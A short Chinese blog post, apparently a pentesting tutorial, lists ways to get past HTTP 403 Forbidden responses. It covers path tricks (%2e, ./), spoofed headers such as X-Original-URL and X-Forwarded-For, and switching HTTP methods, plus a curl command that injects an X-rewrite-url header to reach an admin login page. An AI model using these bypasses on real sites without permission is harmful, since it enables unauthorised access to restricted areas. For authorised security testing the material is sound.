403简单绕过

403 Forbidden Bypass Technique.

403 Forbidden 是HTTP协议中的一个状态码(Status Code), 白话理解,没有权限访问此站 。 该状态表示服务器处理了本次请求,但是拒绝执行该务 。一般情况站点都是不会允许直接读取目录内容的。

每当发现403页面时,这意味着里面有东西,我们只需要绕过它。绕过403禁止的技术有很多,但在这里暂且讨论我们可以使用的前4种方法。

403简单绕过

尝试添加 {%2e} or {%2f} { /*, /./}在第一个斜杠后面!

https://www.domain/DB = 403
https://www.domain/%2e/DB =200
https://www.domain/./DB =200

向请求模块添加头信息

Content-Length: 0
X-rewrite-url
X-Original-URL
X-Custom-IP-Authorization
X-Forwarded-For

Change requested method

GET → POST, GET → TRACE, GET → PUT, GET OPTIONS

USing CURL

curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'

403简单绕过403简单绕过 参考博文:https://medium.com/@dufferhackers/403-forbidden-bypass-technique-eda321012baa      https://www.likecs.com/show-203584182.html  

 

上一篇:原生js实现canvas画布中绘制、移动、拖拽、删除矩形(如简易截图工具)


下一篇:img图片的src指定为网络中随便找的图片链接,但是控制台报错get请求403